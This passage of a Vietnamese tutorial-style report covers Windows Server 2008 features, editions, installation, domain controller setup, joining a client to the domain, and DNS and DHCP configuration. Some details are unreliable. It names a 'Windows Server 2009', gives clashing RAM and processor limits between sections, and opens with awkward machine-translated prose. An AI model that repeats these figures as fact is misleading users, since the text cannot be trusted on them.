o Tháp đĩa CD / DVD

o Máy in và máy chủ Fax

- Quản lý virus : Một trong những mối đe dọa lớn nhất đối với mạng của bạn là khả năng

lây nhiễm từ virus, phần mềm gián điệp và thư rác. Vì vậy, có tốt, cập nhật, phần mềm

chống virus được cài đặt trên hệ thống của bạn là một điều cần thiết. Trong một văn

phòng của 10 người hoặc ít hơn, hệ thống có thể được duy trì riêng. Bất cứ điều gì nhiều



hơn thế, tuy nhiên, có thể trở thành một gánh nặng thực sự. Trong những trường hợp này,

một gói phần mềm chống virus kết hợp máy trạm và bảo vệ chống virus máy chủ vào một

giải pháp duy nhất có ý nghĩa hơn.

- Sao lưu tập trung: Tất cả các doanh nghiệp nên sao lưu dữ liệu của họ một cách thường

xuyên. Bởi có tất cả các công ty của bạn và dữ liệu nhân viên được lưu trữ tại một địa

điểm, bản sao lưu có thể được thực hiện đáng tin cậy và nhanh chóng. Vì vậy, bạn sẽ

không bao giờ cần phải lo lắng về những dữ liệu được lưu trữ trên những gì máy trạm

như bạn làm trong một mạng peer-to-peer. Ngày nay, hầu hết các loại phương tiện truyền

thông có thể được sử dụng cho mục đích sao lưu. Ngoài các ổ đĩa truyền thống băng, đĩa

CD, DVD, lưu trữ và thậm chí loại bỏ Network Attached Storage (NAS) thiết bị này là

chấp nhận được. Sự lựa chọn của bạn của phương tiện truyền thông sẽ phụ thuộc vào yêu

cầu cụ thể của bạn sao lưu. Tùy thuộc vào ngân sách của bạn và nhu cầu lưu giữ dữ liệu

của bạn, bất kỳ trong số này sẽ là một giải pháp chấp nhận được. Hãy chắc chắn rằng bạn

có ít nhất một bản sao lưu hàng tuần theo lịch trình, mặc dù hàng ngày sẽ tốt hơn.

CHƯƠNG 3: TỔNG QUAN VỀ WINDOWS SERVER 2008

I. GIỚI THIỆU WINDOWS SERVER 2008

Microsoft Windows Server 2008 là thế hệ kế tiếp của hệ điều hành Windows

Server, có thể giúp các chuyên gia công nghệ thông tin có thể kiểm soát tối đa cơ

sở hạ tầng của họ và cung cấp khả năng quản lý và hiệu lực chưa từng có, là sản

phẩm hơn hẳn trong việc đảm bảo độ an toàn, khả năng tin cậy và môi trường máy

chủ vững chắc hơn các phiên bản trước đây.

Windows Server 2008 cung cấp những giá trị mới cho các tổ chức bằng việc

bảo đảm tất cả người dùng đều có thể có được những thành phần bổ sung từ các

dịch vụ từ mạng. Windows Server 2008 cũng cung cấp nhiều tính năng vượt trội

bên trong hệ điều hành và khả năng chuẩn đoán, cho phép các quản trị viên tăng

được thời gian hỗ trợ cho các doanh nghiệp.

Windows Server 2008 được thiết kế để cung cấp cho các tổ chức có được

nền tảng sản xuất tốt nhất cho ứng dụng, mạng và các dịch vụ web từ nhóm làm



việc đến những trung tâm dữ liệu với tính năng động, tính năng mới có giá trị và

những cải thiện mạnh mẽ cho hệ điều hành cơ bản.

Cải thiện hệ điều hành cho máy chủ Windows.Thêm vào tính năng mới,

Windows Server 2008 cung cấp nhiều cải thiệm tốt hơn cho hệ điều hành cơ bản so

với hệ điều hành Windows Server 2003.

Những cải thiện có thể thấy được gồm có các vấn đề về mạng, các tính năng

bảo mật nâng cao, truy cập ứng dụng từ xa, quản lý role máy chủ tập trung, các

công cụ kiểm tra độ tin cậy và hiệu suất, nhóm chuyển đổi dự phòng, sự triển khai

và hệ thống file.

II. CÁC TÍNH NĂNG CỦA WINDOWS SERVER 2008

1. Công cụ quản trị Server Manager

Server Manager là một giao diện điều khiển được thiết kế để tổ chức và quản

lý một server chạy hệ điều hành Windows Server 2008. Người quản trị có thể sử

dụng Server Manager với những nhiều mục đích khác nhau.

- Quản lý đồng nhất trên một server

- Hiển thị trạng thái hiện tại của server

- Nhận ra các vấn đề gặp phải đối với các role đã đƣợc cài đặt một cách dễ dàng

hơn

- Quản lý các role trên server, bao gồm việc thêm và xóa role

- Thêm và xóa bỏ các tính năng

- Chẩn đoán các dấu hiệu bất thường

- Cấu hình server: có 4 công cụ (Task Scheduler, Windows Firewall, Services và

WMI Control).

- Cấu hình sao lưu và lưu trữ: các công cụ giúp bạn sao lưu và quản lý ổ đĩa là

Windows Server Backup và Disk Management đều nằm trên Server Manager.



2. Windows Server Core

- Server Core là một tính năng mới trong Windows Server 2008. Nó cho phép có

thể cài đặt với mục đích hỗ trợ đặc biệt và cụ thể đối với một số role.

- Tất cả các tương tác với Server Core được thông qua các dòng lệnh.

Server Core mang lại những lợi ích sau:

+Giảm thiểu được phần mềm, vì thế việc sử dụng dung lượng ổ đĩa cũng được

giảm. Chỉ tốn khoảng 1GB khi cài đặt.

+ Bởi vì giảm thiểu được phần mềm nên việc cập nhật cũng không nhiều.

+ Giảm thiểu tối đa những hành vi xâm nhập vào hệ thống thông qua các port được

mở mặc định.

+ Dễ dàng quản lý.

- Server Core không bao gồm tất cả các tính năng có sẵn trong những phiên bản cài

đặt Server khác. Ví dụ như .NET Framework hoặc Internet Explorer.

3. PowerShell

- PowerShell là một tập hợp lệnh. Nó kết nối những dòng lệnh shell với một ngôn

ngữ script và thêm vào đó hơn 130 công cụ dòng lệnh(được gọi là cmdlets).Hiện

tại, có thể sử dụng PowerShell trong:

+ Exchange Server

+ SQL Server

+ Terminal Services

+ Active Directory Domain Services.

+ Quản trị các dịch vụ, xử lý và registry.

- Mặc định, Windows PowerShell chưa được cài đặt. Tuy nhiên bạn có thể cài đặt

nó một cách dễ dàng bằng cách sử dụng công cụ quản trị Server Manager và chọn

Features > Add Features



4. Windows Deloyment Services.

- Windows Deployment Services được tích hợp trong Windows Server 2008 cho

phép bạn cài đặt hệ điều hành từ xa cho các máy client mà không cần phải cài đặt

trực tiếp. WDS cho phép bạn cài đặt từ xa thông qua Image lấy từ DVD cài đặt.

Ngoài ra, WDS còn hỗ trợ tạo Image từ 1 máy tính đã cài đặt sẵn Windows và đầy

đủ các ứng dụng khác.

- Windows Deployment Serviece sử dụng định dạng Windows Image (WIM). Một

cải tiến đặc biệt với WIM so với RIS là WIM có thể làm việc tốt với nhiều nền

tảng phần cứng khác nhau.

5. Terminal Services.

- Terminal Services là một thành phần chính trên Windows Server 2009 cho phép

user có thể truy cập vào server để sử dụng những phần mềm.

- Terminal Services giúp người quản trị triển khai và bảo trì hệ thống phần mềm

trong doanh nghiệp một cách hiệu quả. Người quản trị có thể cài đặt các chương

trình phần mềm lên Terminal Server mà không cần cài đặt trên hệ thống máy

client, vì thế việc cập nhật và bảo trì phần mềm trở nên dễ dàng hơn.

- Terminal Services cung cấp 2 sự khác biệt cho người quản trị và người dùng cuối

- Dành cho người quản trị: cho phép quản trị có thể kết nối từ xa hệ thống quản trị

bằng việc sử dụng Remote Desktop Connection hoặc Remote Desktop.

- Dành cho người dùng cuối: cho phép người dùng cuối có thể chạy các chương

trình từ Terminal Services server.

6. Network Access Protection

- Network Access Protection (NAP) là một hệ thống chính sách thi hành (Health

Policy Enforcement) được xây dựng trong các hệ điều hành Windows Server 2008.

- Cơ chế thực thi của NAP:

+ Kiểm tra tình trạng an toàn của client.

+ Giới hạn truy cập đối với các máy client không an toàn.



+ NAP sẽ cập nhật những thành phần cần thiết cho các máy client không an toàn,

cho đến khi client đủ điều kiện an toàn.Cho phép client kết nối nếu client đã thỏa

điều kiện.

+ NAP giúp bảo vệ hệ thống mạng từ các client.

+ NAP cung cấp bộ thư viên API (Application Programming Interface), cho phép

các nhà

quản trị lập trình nhằm tăng tính bảo mật cho mình

7. Read-Only Domain Controllers

Read-Only Domain Controller (RODC) là một kiểu Domain Controller mới

trên Windows Server 2008.Với RODC, doanh nghiệp có thể dễ dàng triển khai các

Domain Controller ở những nơi mà sự bảo mật không được đảm bảo về bảo mật.

RODC là một phần dữ liệu của Active Directory Domain Services.

Vì RODC là một phần dữ liệu của ADDS nên nó lưu trữ mọi đối tượng,

thuộc tính và các chính sách giống như domain controller, tuy nhiên mật khẩu thì

bị ngoại trừ.

8. Công nghệ Failover Clustering.

Clustering là công nghệ cho phép sử dụng hai hay nhiều server kết hợp với

nhau để tạo thành một cụm server để tăng cường tính ổn định trong vận hành.Nếu

server này ngưng hoạt động thì server khác trong cụm sẽ đảm nhận nhiệm vụ mà

server ngưng hoạt động đó đang thực hiện nhằm mục đích hoạt động của hệ thống

vẫn bình thường. Quá trình chuyên giao gọi là fail-over.

Những phiên bản sau hỗ trợ:

Windows Server 2008 Enterprise

Windows Server 2008 Datacenter

Windows Server 2008 Itanium



9. Windows Firewall with Advance Security

Windows Firewall with Advance Security cho phép người quản trị có thể

cấu hình đa dạng và nâng cao để tăng cường tính bảo mật cho hệ thống.

Windows Firewall with Advance Security có những điểm mới:

Kiểm soát chặt chẽ các kết nối vào và ra trên hệ thống (inbound và

outbound)

IPsec được thay thế bằng khái niệm Connection Security Rule, giúp bạn có

thể kiểm soát và quản lý các chính sách, đồng thời giám sát trên firewall.

Kết hợp với Active Directory.

Hỗ trợ đầy đủ IPv6.

III. MỘT SỐ TÍNH NĂNG MỚI CỦA WINDOWS SERVER 2008

1. Công nghệ ảo hóa Hyper-V

Hyper-V là công nghệ ảo hóa server thế hệ mới của Microsoft, sự thay đổi

lớn nhất mà Microsoft mang lại so với phiên bản Windows Server 2003. Hyper-V

hoạt động trên nền hệ điều hành 64-bit. Với Hyper-V, người sử dụng có thể sở hữu

một nền tảng ảo hóa linh hoạt, bảo mật, tối đa hiệu suất và tiết kiệm chi phí:

Hyper-V có thể thích nghi với doanh nghiệp lớn với hàng nghìn máy tính

hoặc các doanh nghiệp nhỏ hay văn phòng chi nhánh. Hyper-V hỗ trợ bộ

nhớ ảo lên đến 64GB, đa bộ vi xử lý.

Khả năng bảo mật giống như các server vật lý. Kết hợp các cộng cụ bảo mật

Windows Firewall, Network Access Protection…do đó tính bảo mật tốt như

môi trường thật.

Hyper-V giúp khai thác tối đa hiệu suất sử dụng phần cứng server. Bằng

việc hợp nhất server, cho phép một server vật lý có thể đóng nhiều vai trò

của nhiều server. Từ đó, tiết kiệm được chi phí từ các khoảng mua server,

điện, không gian và bảo trì.

Hyper-V chỉ có thể hỗ trợ đến 32 bộ vi xử lý.



2. Processor Compatibility Mode

Cho phép di trú các máy ảo sang một máy chủ vật lý khác với một phiên bản

CPU khác (nhưng không phải là CPU của nhà sản xuất khác). Trước đây, để

chuyển một máy ảo Hyper-V sang một phần cứng khác, các CPU phải giống nhau,

điều đó yêu cầu người dùng thường phải mua lại phần cứng mới.

3. File Classification Infrastructure

FCI là một tính năng built-in cho phép các chuyên gia CNTT phân loại và

quản lý dữ liệu trong các máy chủ file. Dữ liệu có thể được phân loại với tác động

doanh nghiệp mức thấp, cao hoặc trung bình, sau đó người dùng có thể backup các

dữ liệu quan trọng nhất dễ dàng hơn và hiệu quả hơn.

4. Quản lý trong ỗ đĩa và file:

Cung cấp khả năng thay đổi kich thước phân vùng.

Shadow Copy hỗ trợ ổ đĩa quang, ổ đĩa mạng.

Distributed File System được cải tiến.

Cải tiến Failover Clustering.

Internet Storage Naming Server cho phép đăng ký, hủy đăng ký tập trung và

truy xuất tới các ổ đĩa cứng iSCS.

5. Cải tiến giao thức và mã hóa

o Hỗ trợ mã hóa 128 và 256 bit cho giao thức chứng thực Keberos.

o Hàm API mã hóa mới hỗ trợ mã hóa vòng elip và cải tiến quản lý chứng chỉ.

o Giao thức VPN mới Secure Socket Tunneling Protocol.

o AuthIP được sử dụng trong mạng VPN Ipsec.

o Giao thức Server Message Block 2.0 cung cấp các cải tiến trong truyền

thông.

6. Một số tính năng khác

Windows Deployment Services thay thế cho Automated Deployment

Services và Remote Installation Services.23

Nghiên Cứu và Triển Khai Các Dịch Vụ Mạng Windows Server 2008


IIS 7 thay thế IIS 6, tăng cường khả năng bảo mật, cải tiến công cụ chuẩn

đoán, hỗ trợ quản lý.

Có thành phần "Desktop Experience" cung cấp khả năng cải tiến giao diện.

IV. CÁC LỢI ÍCH CỦA WINDOWS SERVER 2008

Windows Server 2008 mang đến lợi ích trong bốn lĩnh vực:Web, Ảo hóa,

Bảo mật, Nền tảng vững chắc cho các hoạt động của tổ chức

1. Web

Windows Server 2008 cung cấp một nền tảng đồng nhất để triển khai dịch

vụ Web nhờ tích hợp IIS7.0,ASP.NET,Windows Communication Foundation và

Microsoft Windows SharePoint Services.

Lợi ich của IIS 7.0:

Tinh năng phân tích

Quản trị hiệu quả.

Nâng cao tính bảo mật.

Giảm chi phí hỗ trợ.

Giao diện thân thiện và tiện dụng

Hỗ trợ việc sao chép giữa các site.

Copy dễ dàng các thiết lập của trang web giữa các máy chủ web khác nhau

mà không cần phải thiết lập gì thêm.

Chính sách phân quyền quản trị các ứng dụng và các site rõ ràng

2. Ảo hóa :

Phiên bản 64 bit của Windows Server 2008 được tích hợp sẵn công nghệ ảo

hóa hypervisor :

Cho phép máy ảo tương tác trực tiếp với phần cứng máy chủ hiệu quả hơn.

Có khả năng ảo hóa nhiều hệ điều hành khác nhau trên cùng 1 phần cứng

máy chủ sẽ làm giảm chi phí, tăng hiệu suất sử dụng phần cứng, tối ưu hóa

hạ tầng, nâng cao tính sẵn sàng của máy chủ.



Tiết kiệm chi phí mua sắm bản quyền phần mềm.

Tich hợp và tập trung các ứng dụng phục vụ cho việc truy cập từ xa một

cách dễ dàng bằng cách sử dụng Terminal Services.

3. Bảo mật:

Các tính năng an ninh bao gồm: Network Access Protection, Read-Only

Domain Controller, BitLocker, Windows Firewall… cung cấp các mức bảo vệ

chưa từng có cho hệ thống mạng, dữ liệu và công việc của tổ chức.

3.1. Network Access Protection (NAP):

NAP dùng để thiết lập chính sách mạng đối với các máy trạm khi máy trạm

đó muốn kết nối váo hệ thống mạng của tổ chức. Yêu cầu an ninh đối với

máy trạm được kết nối với hệ thống mạng:

Đã cài đặt phầm mềm diệt virus.

Đã cập nhật phiên bản mới.

Đã cài đặt các bản và lỗi hệ thống hoặc đã cài đặt phần mềm firewall.

3.2. Read-Only Domain Controller (RODC):

Là một kiểu Domain Controller (DC).

- RODC chứa một bản sao các dữ liệu "chỉ đọc" của dữ liệu Active Directory

(AD).

- User không thẻ ghi trực tiếp vào RODC.

- RODC không chứa thông tin về mật khẩu trong AD, mà chỉ caching các

users được phép sử dụng ở đó.

RODC thích hợp cho việc triển khai ở các chi nhánh, nơi có điều kiện bảo mật

kém cũng như trình độ của nhân viên IT còn hạn chế.

3.3. BitLocker:

o Bảo vệ an toàn cho máy chủ, máy trạm, máy tính di động.

o Mã hóa nội dung của ổ đĩa nhằm ngăn cản



o Nâng cao khả năng bảo vệ dữ liệu: kết hợp chức năng mã hóa tập tin hệ

thống và kiểm tra tinh toàn vẹn của các thành phần khi boot.

o Toàn bộ tập tin hệ thống được mã hóa, gồm cả file swap và file hibernation.

3.4. Windows Firewall:

Ngăn chặn các lưu lượng mạng theo cấu hình và các ứng dụng dạng chạy để

bảo vệ mạng khỏi các chương trình và người dùng nguy hiểm.

Hỗ trợ ngăn chặn các thông tin vào và ra.

Sử dụng MMC snap-in ( Windows Firewall with Adbanced Security) để đơn

giản hóa việc cấu hình, quản trị.

V. CÁC PHIÊN BẢN CỦA WINDOWS SERVER 2008

1. Windows Server 2008: ứng dụng cho các trung tâm data lớn, ứng dụng nghiệp

vụ riêng,... khả năng mở rộng cao cho tới 64 bộ xử lý.

2. Windows Server 2008 Standard Edition

Windows Server 2008 Standard là một trong những phiên bản ít tốn kém

nhất của các phiên bản khác nhau có sẵn. Windows Server 2008 Stardard hỗ trợ

tới 4GB RAM và 4 bộ vi xử lý.

Chủ yếu nhắm mục tiêu và các doanh nghiệp vừa và nhỏ. Chỉ có thể nâng

cấp lên Windows Server 2008 Standard từ Windows 2000 Server và Windows

Server 2003 Standard Edition.

3. Windows Server 2008 Enterprise Edition

Windows Server 2008 Enterprise Edition cung cấp chức năng lớn hơn và có

khả năng mở rộng hơn so với bản tiêu chuẩn. Cũng như phiên bản Standard

Edition thì phiên bản Enterprise cũng có cả hai phiên bản 32-bit và 64-bit. Hỗ trợ 8

bộ xử lý và lên tới 64GB bộ nhớ RAM trên hệ thống 32-bit và 2TB RAM trên hệ

thống 64-bit.

Các tính năng khác của ấn bản Doanh nghiệp bao gồm hỗ trợ Clustering đến

8 nút và Active Directory Federated Services (AD FS).



Các phiên bản Windows Server 2000, Windows 2000 Advanced Server,

Windows Server 2003 Standard Edition và Windows Server 2003 Enterprise

Edition đều có thể được nâng cấp lên Windows Server 2008 Enterprise Edition.

4. Windows Server 2008 Datacenter Edition

Phiên bản Datacenter đại diện cuối cùng của loạt sản phẩm máy chủ

Windows 2008 và mục tiêu là nhiệm vụ quan trọng đòi hỏi các doanh nghiệp ổn

định và mức độ thời gian hoạt động cao. Windows Server 2008 phiên bản

Datacenter là liên hệ chặt chẽ với các phần cứng cơ bản thông qua việc thực hiện

tùy chỉnh Hardware Abstraction Layer (HAL).

Windows server 2008 Datacenter cũng hỗ trợ hai phiên bản 32 bit và 64 bit.

Nó hỗ trợ 64GB bộ nhớ RAM trên nền 32 bit và lên tới 2TB RAM trên nền 64 bít.

Ngoài ra phiên bản này còn hỗ trợ tối thiểu là 8 bộ vi xử lý và tối đa là 64.

Để nâng cấp lên phiên bản này thì phải là các phiên bản Datacenter 2000 và

2003.

5. Windows Web Server 2008

Windows Web Server 2008 là một phiên bản của Windows Server 2008

được thiết kế chủ yếu cho mục đích cung cấp các dịch vụ web. Nó bao gồm

Internet Information Services (IIS) 7,0 cùng với các dịch vụ liên quan như

Simple Mail Transfer Protocol (SMTP) và Telnet. Nó cũng có các phiên bản

32-bit và 64-bit, phiên bản và hỗ trợ lên đến 4 bộ vi xử lý. RAM được giới

hạn 4GB và 32GB trên 32-bit và 64-bit hệ thống tương ứng.

Windows Web Server 2008 thiếu nhiều tính năng hiện diện trong các phiên

bản khác như phân nhóm,mã hóa ổ đĩa BitLocker, Multi I/O,Windows

Internet Naming Service (WINS),Removable Storage Management và SAN

Management.



CHƯƠNG 4: CÀI ĐẶT WINDOWS SERVER 2008

I. YÊU CẦU PHẦN CỨNGPhần cứng Yêu cầu tối thiểu Đề nghị

Bộ vi xử lý 1 Ghz (x86), 1,4 Ghz

(x64)

2Ghz hoặc lớn hơn

RAM 512MB RAM 2GB

Dung lượng trống 15GB 40GB

Windows Server 2008 hỗ trợ cả 2 cấu trúc vi xử lý 32-bit và 64-bit. Tuy

nhiên, phiên bản mới nhất là Windows Server 2008 R2, Windows Midmarket

Server và Windows Small Business với những tính năng đa dịch vụ, các phiên bản

này chỉ hỗ trợ cấu trúc vi xử lý 64-bit.

RAM hỗ trợ tối đa cho hệ thống 32-bit là 4GB khi chạy phiên bản

Standard Edition và 64GB khi chạy phiên bản Enterprise và Datacenter. Nếu

chạy hệ thống 64-bit, bộ nhớ RAM có thể hỗ trợ lên dến 32GB và 2TB RAM cho

phiên bản Enterprise và Datacenter. Thêm vào đó, Windows Server 2008 hỗ trợ

hệ thống Itanium, tuy nhiên chip xử lí Intel Itanium 2 nhân là cần thiết.

II. CÁC CÁCH CÀI ĐẶTCó 6 cách cài đặt Windows Server 2008

Tự cài đặt các nâng cấp

Cài đặt từ kịch bản

Sử dụng Sconfig

Visual Core Configurator 2008

Cài đặt bằng cách sử dụng Core Configurator 2.0

Cài đặt trực tiếp từ đĩa CD Windows Server 2008

III. NÂNG CẤP LÊN WINDOWS SERVER 2008Những phiên bản trước Nâng cấp lên Windows Server



2008

Microsoft Windows Server 2003 R2 Standard,

Enterprise hoặc DatacenterEdition

Hỗ trợ đầy đủ

Microsoft Windows Server 2003 Service Pack

1(SP1) Standard, Enterprise hoặc Datacenter

Edition


Microsoft Windows Server 2003 Service Pack

2 (SP2) Standard, Enterprise hoặc Datacenter

Edition


Windows NT 4.0 Không hỗ trợ

Windows 2000 Server Không hỗ trợ

Windows XP Không hỗ trợ

Windows Vista Không hỗ trợ

Windows 7 Không hỗ trợ

Để nâng cấp lên phiên bản Windows Server 2008, cần phải chạy các hệ điều

hành ở cấp độ server. Không thể nâng cấp các phiên bản Windows dành cho người

dùng như Windows XP hoặc Windows Vista lên Windows Server 2008. Để nâng

cấp lên Windows Server 2008, hệ thống của bạn phải chạy Windows Server

2003. Việc nâng cấp từ Windows NT 4.0 và Windows 2000 Server không được hỗ

trợ. Việc nâng cấp từ những phiên bản Windows Server 2003 lên phiên bản

Windows Server 2008 Server Core không được hỗ trợ. Việc nâng cấp chỉ thực hiện

được ở những phiên bản giống nhau. Khi nâng cấp lên phiên bản Windows Server

2008, mọi cấu hình thiết lập, file và các chương trình đều được giữ lại



IV. CÀI ĐẶT WINDOWS SERVER 2008Đặt đĩa CD vào ổ đĩa, khởi động lại máy tính và bắt đầu tiến hành quá trình cài đặt.

Language to instalk : ngôn ngữ bạn muốn hiển thị.

Time and currency format : định dạng thời gian và tiền tệ.

Keyboard or input method : định dạng bàn phím và phương thức nhập chữ.Sau

khi lựa chọn, click Next để tiếp tục cài đặt



Click Install now để bắt đầu cài đặt.

Lựa chọn phiên bản Windows Server thích hợp, ở đây chúng ta chọn phiên

bản Windows Server Standard without Hyper-V. Click Next để tiếp tục.



Tại bảng MICROSOFT PRE-RELEASE SOFTWARE LICENSE

TERMS là những điều khoản sử dụng sản phẩm của Microsoft. Đánh dấu

chọn vào I accept the license terms để chấp nhận những điều khoản đó và

click Next để tiếp tục.



Chọn Custom (advaneced) để tiến hành cài đặt tùy chọn.

Tiếp theo là chọn ổ đĩa để cài dặt Windows. Tiếp tục click Next sau khi đã chọn ổ

đĩa cài đặt.



Đợi cho đến khi hoàn tất cài đặt Windows Server 2008

Sau khi hệ thống hoàn tất cái đặt sẽ tự động đăng nhập vời tài khoản

Administrator, tuy nhiên mật khẩu đang ở trạng thái trống (blank) vì thế cần phải

thiết lập mật khẩu ở lần đăng nhập đầu tiên.

Click OK để tiến hành thay đổi mật khẩu.Sau đó đăng nhập vào bằng mật khẩu vừa

thay đổi.

Đến đây quá trình cài đặt kết thúc.

Tham khảo video tại: http://www.youtube.com/watch?v=vX3HKpzykZ4


http://www.youtube.com/watch?v=vX3HKpzykZ4


CHƯƠNG 5: DỰNG DOMAIN CONTROLLER

Giống như Windows Server 2003 sẽ vẫn cần chạy dcpromo từ nhắc lệnh

Run, tuy nhiên cần phải cài đặt Active Directory Domain Controller role, đầu

tiên bạn cài đặt role, sau đó chạy dcpromo.Vào Server Manager Roles

Add Roles

Xuất hiện trang Before You Begin, nhấn Next để tiếp tục.



Chọn Active Directory Domain Services Add Required Features để cài đặt

thêm các tính năng này với Active Directory Server Role.

Sau khi chọn Active Directory DC Server Role, bạn sẽ thấy các thông tin về Server

Role.

Kích Install để cài đặt các file yêu cầu nhằm chạy dcpromo



Cài đặt được thực hiện thành công. Kích Close.

Trong bài này, chúng ta sẽ sử dụng 2 máy.

PC1: Là máy sử dụng Windows Server 2008.



PC2: Là máy sử dụng Client sử dụng Windows 7.

Quá trình cài đặt sẽ trải qua 2 bước chính:

Bước 1: Chỉnh Preferred DNS

- Ở bước này chúng ta sẽ chỉnh Preferred DNS về chính máy tính của chúng ta, ở

đây là ip 192.168.1.1.

Trong trường hợp giả sử chúng ta quên làm bước này, thì quá trình nâng cấp

vẫn diễn ra bình thường, và Windows sẽ tự chỉnh Preferred DNS về địa chỉ

192.168.1.1 Nhưng tốt nhất các bạn nên làm bước chỉnh này

Bước 2: Nâng cấp lên Domain Controller

- Bạn vào Start-> Chọn Run, gõ dcpromo và Enter, sau đó lần lượt làm theo các

bước sau:



Tiếp nào.

Thao tác này sẽ khởi chạy Welcome to the Active Directory Domain Service

Installation Wizard. Kích Next.

Sau đó tiếp tục nhấn Next.

Trong trang Choose a Deployment Configuration Create a new domain in a

new forest..



Trong trang Name the Forest Root Domain, nhập vào tên của miền trong hộp

nhập liệu FQDN of the forest room domain.Nhấn Next để tiếp tục.



Nhấn Next để tiếp tục.

Trong trang Set Forest Functional Level, chọn Windows Server 2008. Nhấn Next

để tiếp tục.



Trong trang Additional Domain Controller Options, Chọn DNS server và kích

Next.

Một hộp thoại sẽ xuất hiện nói răng không thể tạo đại biểu cho máy chủ

DNS này vì không thể tìm thấy vùng xác thực hoặc nó không chạy Windows DNS

server. Lý do cho điều này là vì đây là DC đầu tiên trên mạng. Nhấn Next để tiếp

tục.



Để lại thư mục Database, Log Files và SYSVOL ,kích Next.



Trong Directory Service Restore Mode Administrator Password, nhập

một mật khẩu mạnh vào các hộp nhập liệu Password và Confirm password.

Xác nhận các thông tin trên trang Summary và kích Next.



Active Directory sẽ cài đặt. Đặt một dấu kiểm vào hộp chọn Reboot on

completion để máy tính sẽ tự động khởi động lại khi cài đặt DC được hoàn tất.

Tham khảo video tại: http://www.youtube.com/watch?v=6CXrntG26r4


http://www.youtube.com/watch?v=6CXrntG26r4


CHƯƠNG 6: JOIN DOMAINChỉnh ip của máy Windows 7 sao cho cùng địa chỉ của lớp mà ta đã chọn ở

máy Server. Gateway và DNS trỏ về địa chỉ ip của máy Server.

Vào Start click phải computer chọn properties. Chọn change settings.



Click vào mở hộp thoại change.



Nhập domain của máy server vào -> OK

Nhập Administrator và pass.

Click OK.



Ta vào lại thấy hộp thoại đã có domain.

Tham khảo video tại: http://www.youtube.com/watch?v=NS525zebpx4

CHƯƠNG 7: TRIỂN KHAI CÁC DỊCH VỤ MẠNG

I. DỊCH VỤ DNS

1. Giới thiệu về DNSDNS (Domain Name System) Server là máy chủ được dùng để phân giải

domain thành địa chỉ IP và ngược lại. Về cách thức hoạt động, DNS Server lưu trữ


http://www.youtube.com/watch?v=NS525zebpx4


một cơ sở dữ liệu bao gồm các bản ghi DNS và dịch vụ lắng nghe các yêu cầu.Khi

máy client gửi yêu cầu phân giải đến, DNS Server tiến hành tra cứu trong cơ sở dữ

liệu và gửi kết quả tương ứng về máy client.

2. Cài đặt DNSVào Server Manager Roles Add Roles.Tại bảng Select Server Roles, chọn

DNS Server

- Sau đó nhấn Next để tiếp tục

- Chọn Instal. Tại bảng Confirm Installation Selections xác nhận việc cài đặt.



- Chọn Close để hoàn tất cài đặt.

3. Cấu hình DNS- Đối với DNS Server,thông thường nên xây dựng đồng thời hai hệ thống là DNS

Server chính (Primary) và DNS Server dự phòng (Secondary) dùng chung một cơ



sở dữ liệu. Với phương pháp này,sẽ hạn chế khả năng dịch vụ DNS bị ngưng khi

có sự cố xảy ra trên hệ thống.

- Vào Start Administrative Tools DNS.

- Nhấp chuột phải vào Forward Lookup Zones và chọn New Zone.

-

Tại bảng Welcome to the New Zone Wizard ,chọn Next



- Tại bảng Zone Type chọn Primary zone để cấu hình DNS Server chính.

- Chọn Next. Tại bảng Zone Name gõ tên domain vào.

-

Chọn

Next. Tại bảng Zone File, để mặc định. Chọn Next.



- Chọn Next. Tại bảng Completing the New Zone Wizard xem lại thông tin.

- Sau đó chọn Finish để hoàn tất.

- Nhấp chuột phải vào Reverse Lookup Zones và chọn New Zone.



- Tại bảng Welcome to the New Zone Wizard chọn Next.

- Tại bảng Zone Type chọn Primary zone để cấu hình chức năng reverse cho DNS

Server chính.

- Chọn Next.Tại bảng Reverse Lookup Zone Name chọn kiểu IP cần phân giải. Ở

đây chọn IPv4.



- Chọn Next. Điền Network ID và chọn Next.

- Tại bảng Zone File để mặc định. Chọn Next.

- Tại bảng Dynamic Update chọn Allow both nonsecure dynamic updates.



- Chọn Next và xem lại thông tin thiết lập, và sau đó chọn Finish để kết thúc.

Bổ sung các bản ghi DNS vào DNS Server

- Vào Start Administrative Tools DNS. Nhấp chuột phải vào zone và chọn

New

- Gõ tên host vào mục Name, gõ địa chỉ IP vào mục IP address. Nếu muốn tạo ra

một bản ghi DNS phân giải ngược tương ứng thì đánh dấu chọn Create associated

pointer (PTR) record.



- Sau đó chọn Add Host.Xuất hiện thông báo thành công.

Kiểm tra

Tham khảo video tại: http://www.youtube.com/watch?v=KTge5mwqsoY

Dịch vụ DHCP

II. GIỚI THIỆU DỊCH VỤ DHCP Dịch vụ DHCP cho phép chúng ta cấp động các thông số cấu hình mạng cho

các máy trạm.(client).

Cơ chế sử dụng các thông số mạng được cấp phát động có ưu điểm hơn so

với cơ chế khai báo tĩnh các thông số mạng như:

Khắc phục được tình trạng đụng địa chỉ IP và giảm chi phí quản trị cho hệ

thống mạng.Giúp cho các nhà cung cấp dịch vụ (ISP) tiết kiệm được số

lượng địa chỉ IP thật (Public IP).Phù hợp cho các máy tính thường xuyên di


http://www.youtube.com/watch?v=KTge5mwqsoY


chuyển qua lại giữa các mạng.Kết hợp với hệ thống mạng không dây

(Wireless) cung cấp các điểm Hotspot như: nhà ga, sân bay, trường học…

1. Hoạt động của giao thứcGiao thức DHCP làm việc theo mô hình client/server.Khi máy client khởi

động, máy sẽ gửi broadcast gói tin DHCPDISCOVER, yêu cầu một server phục vụ

mình. Gói tin này cũng chứa địa chỉ MAC của máy client.Các máy Server trên

mạng khi nhận được gói tin yêu cầu đó, nếu còn khả năng cung cấp địa chỉ IP, đều

gửi lại cho máy Client gói tin DHCPOFFER, đề nghị cho thuê một địa chỉ IP trong

một khoản thời gian nhất định, kèm theo là một subnet mask và địa chỉ của Server.

2. Cài đặt trên windows server 2008- Vào Server Manger Roles Add Roles.

Nhấn Next trong mục Roles chọn “DHCP Server”. Nhấn Next.



Trong bảng này giới thiệu về DHCP và các điểm cần lưu ý Things to Note.

Tiếp tục nhấn Next.

Chọn card mạng sử dụng dịch vụ này ở đây chúng ta chỉ có một card mạng nên

tiếp tục nhấn Next nhấn Next.

- Trong mục “Parent Domain” điền tên domain và điền IP DNS server ở mục

“Preferred DNS…” và nhấn Validate để kiểm tra và xác nhận tồn tại và tiếp tục

nhấn Next.



-

Tiếp tục

nhấn Next.

Tiếp tục bấm Next. Trong Bảng Configure DHCPv6 Stateless Mode ta

chọn Disable DHCPv6 stateless mode for this server và bấm Next



-

Chọn user có quyền Author Next.

